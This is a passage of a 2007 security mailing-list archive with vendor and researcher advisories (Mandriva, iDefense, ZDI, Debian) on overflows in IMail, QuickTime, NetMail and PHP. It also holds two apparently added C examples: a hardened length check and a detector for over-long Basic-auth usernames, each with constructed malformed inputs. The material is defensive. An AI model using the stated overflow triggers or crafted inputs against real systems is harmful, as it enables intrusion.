http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.06_powerpc.deb Size/MD5: 190880 34d32b90b85048df075b64570bed5d74 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.06_powerpc.deb Size/MD5: 58538 512fe71392f887c32b3f5d096abe3ac4 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.06_powerpc.deb Size/MD5: 11624320 2bff41c1ed67e361243b12dc9bc8cf68 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.06_sparc.deb Size/MD5: 3529076 2c3f05b9709a35fe8a04cb9635ded807 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.06_sparc.deb Size/MD5: 188328 09a45d676c00517e501371978a44ea88 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.06_sparc.deb Size/MD5: 56414 cf685a4cca2d52a949bb4b6ae5644ba4 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.06_sparc.deb Size/MD5: 10818756 e2c84d36ac95f59d55e61a165d036cf4 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.10.diff.gz Size/MD5: 455368 b1b05ec9b0524d9837f9dbc1886ba5db http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.10.dsc Size/MD5: 963 7d3d9373365c63f81f1893cf1c0343e6 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.10_amd64.deb Size/MD5: 3534530 b91a4f3fa51ce679b526b603c53f606c 
http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.10_amd64.deb Size/MD5: 194290 f1316eedba06e1fa05b61bd40661447c http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.10_amd64.deb Size/MD5: 59412 a8d368db2641ad759235f63b60adca94 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.10_amd64.deb Size/MD5: 12068840 097951e9a5ab8c54a9beff73fe38feff i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.10_i386.deb Size/MD5: 3530892 4ffa7353a111fadee3aa3971529a026d http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.10_i386.deb Size/MD5: 188958 bf234cf79421a6fff37f1c10a81e4c42 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.10_i386.deb Size/MD5: 56050 ec52c524dacf263fd93b4eb8c88e1a77 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.10_i386.deb Size/MD5: 10804696 67b115670c9a231cbd643d8eb98e3207 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.10_powerpc.deb Size/MD5: 3532760 ddbf679b2c92f5dc8bff86f96f87dfe2 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.10_powerpc.deb Size/MD5: 191388 f1cf1a7112e492784fa822d82d8c70f4 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.10_powerpc.deb Size/MD5: 59058 fe7ae7579b6c325fd5276fdd7085caa1 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.10_powerpc.deb Size/MD5: 
11753272 51eb235e10f5ce40e75d9eceb1a1a460

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.10_sparc.deb
      Size/MD5: 3529194 e20b5525b8119e82c6887a363b652c12
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.10_sparc.deb
      Size/MD5: 188778 f97c647566c1ade50a2d838dd5a0f906
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.10_sparc.deb
      Size/MD5: 56468 bea9f315b787f5841932a27c61c4ed26
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.10_sparc.deb
      Size/MD5: 11019700 0bd22175edc692013128f0b278832027

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070306/f91e5125/attachment.bin

From security at mandriva.com Wed Mar 7 02:41:43 2007
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 06 Mar 2007 19:41:43 -0700
Subject: [Full-disclosure] [ MDKSA-2007:053 ] - Updated util-linux packages address umount crash issue
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2007:053
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : util-linux
 Date    : March 6, 2007
 Affected: 2006.0, 2007.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 Umount allows local users to trigger a NULL dereference and application
 crash by invoking the program with a pathname for a USB pen drive that
 was mounted and then physically removed, which might allow the users
 to obtain
sensitive information, including core file contents.

 Updated packages have been patched to address this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0822
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2006.0:
 4cebdff08516af8c2b0699fd653e4a67  2006.0/i586/losetup-2.12q-7.1.20060mdk.i586.rpm
 5b313c5f38551e902189d2137ca5ba90  2006.0/i586/mount-2.12q-7.1.20060mdk.i586.rpm
 a64f898f2a35c4ebe8c7665aa9ac04b7  2006.0/i586/util-linux-2.12q-7.1.20060mdk.i586.rpm
 4181f6388cffa1f5d0c134a0e794ea71  2006.0/SRPMS/util-linux-2.12q-7.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 3011f9fab70a764f603f2986f866fbf1  2006.0/x86_64/losetup-2.12q-7.1.20060mdk.x86_64.rpm
 bf21334b7e55bad39b4443c2662e2763  2006.0/x86_64/mount-2.12q-7.1.20060mdk.x86_64.rpm
 ad2334ebeedebd8ac97a7f5dd9eb069c  2006.0/x86_64/util-linux-2.12q-7.1.20060mdk.x86_64.rpm
 4181f6388cffa1f5d0c134a0e794ea71  2006.0/SRPMS/util-linux-2.12q-7.1.20060mdk.src.rpm

 Mandriva Linux 2007.0:
 be8d93e00b9409cd85cb861968b686f4  2007.0/i586/losetup-2.12r-8.1mdv2007.0.i586.rpm
 597f4b9617ae60582bd32e0e63f4fbd3  2007.0/i586/mount-2.12r-8.1mdv2007.0.i586.rpm
 cb2af6b6338503687b2d9bf981ec6eae  2007.0/i586/util-linux-2.12r-8.1mdv2007.0.i586.rpm
 84c9f8434a019c30f48b43918be5f9b0  2007.0/SRPMS/util-linux-2.12r-8.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 e98587221d25c0ac85e2940d86804dc8  2007.0/x86_64/losetup-2.12r-8.1mdv2007.0.x86_64.rpm
 2aea6f88545e4cf9044fa881dc2a65c0  2007.0/x86_64/mount-2.12r-8.1mdv2007.0.x86_64.rpm
 935566fa98f9a67e1bf35ef87b1d1246  2007.0/x86_64/util-linux-2.12r-8.1mdv2007.0.x86_64.rpm
 84c9f8434a019c30f48b43918be5f9b0  2007.0/SRPMS/util-linux-2.12r-8.1mdv2007.0.src.rpm

 Corporate 4.0:
 dbbd5f67e178668cad4e5b7ef6e2262d  corporate/4.0/i586/losetup-2.12q-7.1.20060mlcs4.i586.rpm
 ae2f4f127dffbe561e9c5e7317c06e91  corporate/4.0/i586/mount-2.12q-7.1.20060mlcs4.i586.rpm
 a8307c070f29680d1738c9b7f09490bc  corporate/4.0/i586/util-linux-2.12q-7.1.20060mlcs4.i586.rpm
 feb291bbb8a7f6077d07243877820737  corporate/4.0/SRPMS/util-linux-2.12q-7.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 aa38dd206ed22d1bf34754eeffe453a9  corporate/4.0/x86_64/losetup-2.12q-7.1.20060mlcs4.x86_64.rpm
 2ebe6970426e9d05ccf1210c9191022d  corporate/4.0/x86_64/mount-2.12q-7.1.20060mlcs4.x86_64.rpm
 1606664f39063aae9e8c7afa1494ec22  corporate/4.0/x86_64/util-linux-2.12q-7.1.20060mlcs4.x86_64.rpm
 feb291bbb8a7f6077d07243877820737  corporate/4.0/SRPMS/util-linux-2.12q-7.1.20060mlcs4.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF7frTmqjQ0CJFipgRAoIeAJ95zZCDvtYN6gdnE46xMZ4GIk/DuACgyJvt
Y3/T02qmxqESK0wffHeb+hA=
=V7df
-----END PGP SIGNATURE-----

From labs-no-reply at idefense.com Wed Mar 7 15:52:57 2007
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Wed, 07 Mar 2007 10:52:57 -0500
Subject: [Full-disclosure] iDefense Security Advisory 03.07.07: Ipswitch IMail Server 2006 Multiple ActiveX Control Buffer Overflow Vulnerabilities
Message-ID: <45EEDFD9.4040409@idefense.com>

Ipswitch IMail Server 2006 Multiple ActiveX Control Buffer Overflow
Vulnerabilities

iDefense Security Advisory 03.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 07, 2007

I. BACKGROUND

Ipswitch Inc.'s IMail Server is an email server aimed at providing easy
to configure and maintain email services for small organizations. More
information can be found on the vendor's site at the following URL.

http://www.ipswitch.com/products/messaging.asp

II. DESCRIPTION

Remote exploitation of several ActiveX control buffer overflow
vulnerabilities in Ipswitch Inc.'s IMail Server 2006 could allow
attackers to execute arbitrary code with the credentials of the user
visiting a malicious website.

Multiple stack and heap based buffer overflows caused by unsafe strcpy
and wsprintf calls could corrupt memory in a way that leads to code
execution. Details for the vulnerable controls follow:

ProgID: IMAILAPILib.IMailServer
CLSID: 302397C2-8501-11D4-8D29-00010245C51E
targetFile: C:\Program Files\Ipswitch\IMail\IMailAPI.dll
memberName: WebConnect
memberName: Connect

ProgID: IMAILAPILib.IMailLDAPService
CLSID: 889558D4-CE9A-4A1B-B88A-AF7774A80E25
targetFile: C:\Program Files\Ipswitch\IMail\IMailAPI.dll
memberName: Sync3
memberName: Init3

ProgID: IMAILAPILib.IMailUserCollection
CLSID: 302397D6-8501-11D4-8D29-00010245C51E
targetFile: C:\Program Files\Ipswitch\IMail\IMailAPI.dll
memberName: SetReplyTo

III. ANALYSIS

To exploit this issue, a user would have to visit a malicious website
from a computer with IMail Server installed on it. The vulnerable
component is also likely installed with any IPSwitch product that
includes the IMail Server. This includes products such as its
Collaboration Suite packages.

IV. DETECTION

iDefense has confirmed this vulnerability in IMail Server 2006.

V. WORKAROUND

Setting the kill-bit for the following CLSIDs will prevent exploitation
of these vulnerabilities within Internet Explorer.

302397C2-8501-11D4-8D29-00010245C51E
302397D6-8501-11D4-8D29-00010245C51E
889558D4-CE9A-4A1B-B88A-AF7774A80E25

VI.
VENDOR RESPONSE

Ipswitch has addressed the aforementioned vulnerabilities within version
2006.2 of IMail Server. More information can be found from their release
notes at the following URL.

http://support.ipswitch.com/kb/IM-20070305-JH01.htm

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

01/22/2007  Initial vendor notification
03/05/2007  Vendor publicly disclosed issues
03/07/2007  iDefense public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
From zdi-disclosures at 3com.com Wed Mar 7 19:53:17 2007
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Wed, 7 Mar 2007 11:53:17 -0800
Subject: [Full-disclosure] ZDI-07-010: Apple Quicktime UDTA Parsing Heap Overflow Vulnerability
Message-ID:

ZDI-07-010: Apple Quicktime UDTA Parsing Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-010.html
March 7, 2007

-- CVE ID:
CVE-2007-0714

-- Affected Vendor:
Apple

-- Affected Products:
Quicktime Player 7.1

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since May 23, 2006 by the pre-existing Digital Vaccine
protection filter ID 4411. For further product information on the
TippingPoint IPS:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Apple Quicktime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the parsing of forged size fields in
user-defined data atoms (UDTA). By setting this field to an overly large
value, an integer overflow occurs resulting in an exploitable heap
overflow. Successful exploitation results in code execution under the
context of the running user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details
can be found at:

http://docs.info.apple.com/article.html?artnum=61798

-- Disclosure Timeline:
2006.05.23 - Pre-existing Digital Vaccine released to TippingPoint customers
2006.08.14 - Vulnerability reported to vendor
2007.03.07 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security researchers
for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.

From zdi-disclosures at 3com.com Wed Mar 7 19:53:03 2007
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Wed, 7 Mar 2007 11:53:03 -0800
Subject: [Full-disclosure] ZDI-07-009: Novell Netmail WebAdmin Buffer Overflow Vulnerability
Message-ID:

ZDI-07-009: Novell Netmail WebAdmin Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-009.html
March 7, 2007

-- CVE ID:
CVE-2007-1350

-- Affected Vendor:
Novell

-- Affected Products:
Novell NetMail 3.5.2

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since December 14, 2006 by Digital Vaccine protection
filter ID 4927. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Novell NetMail.
Authentication is not required to exploit this vulnerability.

The specific flaw exists in the webadmin.exe process bound by default on
TCP port 89. During HTTP Basic authentication, a long username of at
least 213 bytes will trigger a stack based buffer overflow due to a
vulnerable sprintf() call. Exploitation of this issue can result in
arbitrary code execution.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More details
can be found at:

http://download.novell.com/Download?buildid=sMYRODW09pw

-- Disclosure Timeline:
2006.12.12 - Vulnerability reported to vendor
2006.12.14 - Digital Vaccine released to TippingPoint customers
2007.03.07 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
(Same text as in ZDI-07-010 above.)
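The UDTA flaw in ZDI-07-010 above is the classic shape of a length-field bug: a 32-bit size read from the file is trusted in bounds arithmetic that can wrap. The C below is an added example, not Apple's parser and not part of the advisory, and it generalises the point to any atom-style (size + type) container: over a constructed 32-byte buffer holding an 8-byte 'ftyp' atom followed by a 'udta' atom whose size field is forged to 0xFFFFFFF8, a naive `offset + size <= buf_len` check accepts the forged atom because the addition wraps to 0, while a hardened check that compares the size against the bytes remaining (a subtraction that cannot wrap) rejects it. Sizes 0 and 1, which carry special meanings in the real format, are simply refused here for brevity; nothing is ever copied, so the unsafe check is only ever evaluated, not acted on.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example (not Apple's code): 32-bit big-endian size + 4-byte type. */
#define ATOM_HEADER_LEN 8u

static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Naive bound: "end = offset + size" is computed in 32-bit arithmetic, so a
 * forged size near 0xFFFFFFFF wraps end back below buf_len and the check
 * passes. Returns 1 if the atom would be accepted; nothing is copied. */
int naive_atom_accepts(const uint8_t *buf, uint32_t buf_len, uint32_t offset) {
    if (offset > buf_len || buf_len - offset < ATOM_HEADER_LEN) return 0;
    uint32_t size = be32(buf + offset);
    uint32_t end = offset + size;            /* may wrap */
    return end <= buf_len;
}

/* Hardened bound: compare the size against the bytes that remain, using a
 * subtraction that cannot wrap, and refuse sizes smaller than the header
 * (sizes 0 and 1 have special meanings in the real format; rejected here
 * for brevity). */
int safe_atom_accepts(const uint8_t *buf, uint32_t buf_len, uint32_t offset) {
    if (offset > buf_len || buf_len - offset < ATOM_HEADER_LEN) return 0;
    uint32_t size = be32(buf + offset);
    if (size < ATOM_HEADER_LEN) return 0;
    if (size > buf_len - offset) return 0;   /* atom runs past its container */
    return 1;
}

/* Walk top-level atoms with the hardened check. Returns the number of atoms
 * parsed, or -1 at the first malformed atom. The offset update cannot wrap
 * because size <= buf_len - offset has just been verified. */
int count_atoms_safe(const uint8_t *buf, uint32_t buf_len) {
    uint32_t offset = 0;
    int n = 0;
    while (offset < buf_len) {
        if (!safe_atom_accepts(buf, buf_len, offset)) return -1;
        offset += be32(buf + offset);
        n++;
    }
    return n;
}

/* Constructed sample input: an 8-byte 'ftyp' atom, then a 'udta' atom whose
 * size field is forged to 0xFFFFFFF8, then 16 bytes standing in for whatever
 * happens to follow in memory. */
const uint8_t FORGED_UDTA[32] = {
    0x00, 0x00, 0x00, 0x08, 'f', 't', 'y', 'p',
    0xFF, 0xFF, 0xFF, 0xF8, 'u', 'd', 't', 'a',
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

/* Constructed sample input: the same layout with an honest 'udta' size of 24. */
const uint8_t WELL_FORMED[32] = {
    0x00, 0x00, 0x00, 0x08, 'f', 't', 'y', 'p',
    0x00, 0x00, 0x00, 0x18, 'u', 'd', 't', 'a',
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

int main(void) {
    printf("forged udta, naive check accepts: %d\n",
           naive_atom_accepts(FORGED_UDTA, sizeof FORGED_UDTA, 8));   /* 1 */
    printf("forged udta, safe check accepts:  %d\n",
           safe_atom_accepts(FORGED_UDTA, sizeof FORGED_UDTA, 8));    /* 0 */
    printf("atoms parsed (forged):      %d\n",
           count_atoms_safe(FORGED_UDTA, sizeof FORGED_UDTA));        /* -1 */
    printf("atoms parsed (well-formed): %d\n",
           count_atoms_safe(WELL_FORMED, sizeof WELL_FORMED));        /* 2 */
    return 0;
}
```

The design point is that the remaining-length comparison `size > buf_len - offset` is only safe because `offset <= buf_len` was established first; reviewers looking for this bug class should check that every length-field comparison is phrased as a subtraction from a known-good remainder rather than an addition to the cursor.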
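ZDI-07-009 above reports that the overflow is reached through an over-long username in an HTTP Basic credential, which is something a reverse proxy or log pipeline in front of the service can check for before the request reaches webadmin.exe. The C below is an added example, not Novell's code and not from the advisory: it decodes the base64 of an `Authorization: Basic` header line, measures the username up to the first colon, and flags credentials whose username is at or above the 213-byte length the advisory names (or that do not decode cleanly). The sample header lines are constructed for the example; the long one is assembled from the fact that `AAA` base64-encodes to `QUFB`, so no encoder is needed.

```c
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Added example, not Novell's code. Username length at which ZDI-07-009
 * reports the overflow is reached; anything at or above it is flagged. */
#define SUSPICIOUS_USERNAME_LEN 213

static const char BASIC_PREFIX[] = "Authorization: Basic ";

/* Map one base64 alphabet character to its 6-bit value, or -1. */
static int b64_value(char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode base64 text (stopping at '=' padding or end of line) into out.
 * Returns the decoded length, or -1 on an invalid character or when out_cap
 * would be exceeded: the detector must not repeat the bug it looks for. */
static int b64_decode(const char *in, unsigned char *out, size_t out_cap) {
    unsigned int acc = 0;
    int bits = 0;
    size_t n = 0;
    for (; *in && *in != '=' && *in != '\r' && *in != '\n'; in++) {
        int v = b64_value(*in);
        if (v < 0) return -1;
        acc = ((acc << 6) | (unsigned int)v) & 0xFFFFFF;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n >= out_cap) return -1;
            out[n++] = (unsigned char)((acc >> bits) & 0xFF);
        }
    }
    return (int)n;
}

/* Length in bytes of the username in an "Authorization: Basic ..." header
 * line, i.e. the decoded bytes before the first ':'. Returns -1 when the line
 * is not a Basic credential, does not decode, or carries no ':' separator. */
int basic_auth_username_len(const char *header_line) {
    if (strncmp(header_line, BASIC_PREFIX, sizeof BASIC_PREFIX - 1) != 0) return -1;
    unsigned char decoded[4096];
    int len = b64_decode(header_line + sizeof BASIC_PREFIX - 1, decoded, sizeof decoded);
    if (len < 0) return -1;
    const unsigned char *colon = memchr(decoded, ':', (size_t)len);
    if (colon == NULL) return -1;
    return (int)(colon - decoded);
}

/* Detection rule: 1 if the line carries a Basic credential whose username is
 * at least SUSPICIOUS_USERNAME_LEN bytes, or a Basic credential that is
 * malformed (undecodable or without ':'), which a normal client does not
 * send; 0 for a benign credential or any other header line. */
int is_suspicious_basic_auth(const char *header_line) {
    if (strncmp(header_line, BASIC_PREFIX, sizeof BASIC_PREFIX - 1) != 0) return 0;
    int len = basic_auth_username_len(header_line);
    if (len < 0) return 1;
    return len >= SUSPICIOUS_USERNAME_LEN;
}

/* Constructed sample: a credential for a 216-byte username ("A" x 216) and
 * password "pw". "AAA" base64-encodes as "QUFB" and the trailing ":pw" as
 * "OnB3", so the header can be assembled without an encoder. */
const char *long_username_header(void) {
    static char line[sizeof BASIC_PREFIX - 1 + 72 * 4 + 4 + 1];
    if (line[0] == '\0') {
        strcpy(line, BASIC_PREFIX);
        for (int i = 0; i < 72; i++) strcat(line, "QUFB");
        strcat(line, "OnB3");
    }
    return line;
}

int main(void) {
    /* Constructed sample lines: a benign credential (admin:hunter2), an
     * unrelated header, and the over-long username. */
    const char *lines[] = {
        "Authorization: Basic YWRtaW46aHVudGVyMg==",
        "Host: mail.example.test",
        long_username_header(),
    };
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++)
        printf("username_len=%4d suspicious=%d  %.40s\n",
               basic_auth_username_len(lines[i]),
               is_suspicious_basic_auth(lines[i]), lines[i]);
    return 0;
}
```

Expected output is `username_len=   5 suspicious=0` for the benign line, `-1` / `0` for the Host header, and `216` / `1` for the constructed long credential. The threshold is deliberately a named constant so that a site can lower it to whatever its longest legitimate account name actually is; a malformed credential is treated as suspicious rather than ignored because the vulnerable code path is reached before any password check.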
From jmm at debian.org Wed Mar 7 22:04:16 2007
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Wed, 7 Mar 2007 23:04:16 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1264-1] New php4 packages fix several vulnerabilities
Message-ID: <20070307220416.GA3371@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1264-1                    security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
March 7th, 2007                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : php4
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2007-0906 CVE-2007-0907 CVE-2006-0908 CVE-2007-0909 CVE-2007-0910 CVE-2007-0988

Several remote vulnerabilities have been discovered in PHP, a server-side,
HTML-embedded scripting language, which may lead to the execution of
arbitrary code. The Common Vulnerabilities and Exposures project identifies
the following problems:

CVE-2007-0906

    It was discovered that an integer overflow in the str_replace()
    function could lead to the execution of arbitrary code.

CVE-2007-0907

    It was discovered that a buffer underflow in the sapi_header_op()
    function could crash the PHP interpreter.

CVE-2007-0908

    Stefan Esser discovered that a programming error in the wddx
    extension allows information disclosure.

CVE-2007-0909

    It was discovered that a format string vulnerability in the
    odbc_result_all() functions allows the execution of arbitrary code.

CVE-2007-0910

    It was discovered that super-global variables could be overwritten
    with session data.

CVE-2007-0988

    Stefan Esser discovered that the zend_hash_init() function could be
    tricked into an endless loop, allowing denial of service through
    resource consumption until a timeout is triggered.

For the stable distribution (sarge) these problems have been fixed in
version 4:4.3.10-19.
For the unstable distribution (sid) these problems have been fixed in
version 6:4.4.4-9 of php4 and version 5.2.0-9 of php5.

We recommend that you upgrade your php4 packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-19.dsc
    Size/MD5 checksum: 1686 65acb80d308f7625e8ec91bb6e29eb29
  http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-19.diff.gz
    Size/MD5 checksum: 283658 c7c1e0ce432510ed48cd9e135a21a59e
  http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10.orig.tar.gz
    Size/MD5 checksum: 4892209 73f5d1f42e34efa534a09c6091b5a21e

Architecture independent components:

  http://security.debian.org/pool/updates/main/p/php4/php4-pear_4.3.10-19_all.deb
    Size/MD5 checksum: 250024 8005785eca558044984ca6a66019c02f
  http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-19_all.deb
    Size/MD5 checksum: 1142 bd2113b4fc760a9e2d81f67ccf24fcac

Alpha architecture:

  http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_alpha.deb
    Size/MD5 checksum: 1701456 14d35e1ca06e0a4339b1b8c885a6bd8f
  http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_alpha.deb
    Size/MD5 checksum: 1699180 4e630e589b36cf5143c772802ef4bafc
  http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_alpha.deb
    Size/MD5 checksum: 3466040 56e187c9cabb148b5681074f2ebcf6d2
  http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_alpha.deb
    Size/MD5 checksum: 1743378 4251694e892c47e59dad839e9ab7a2bc
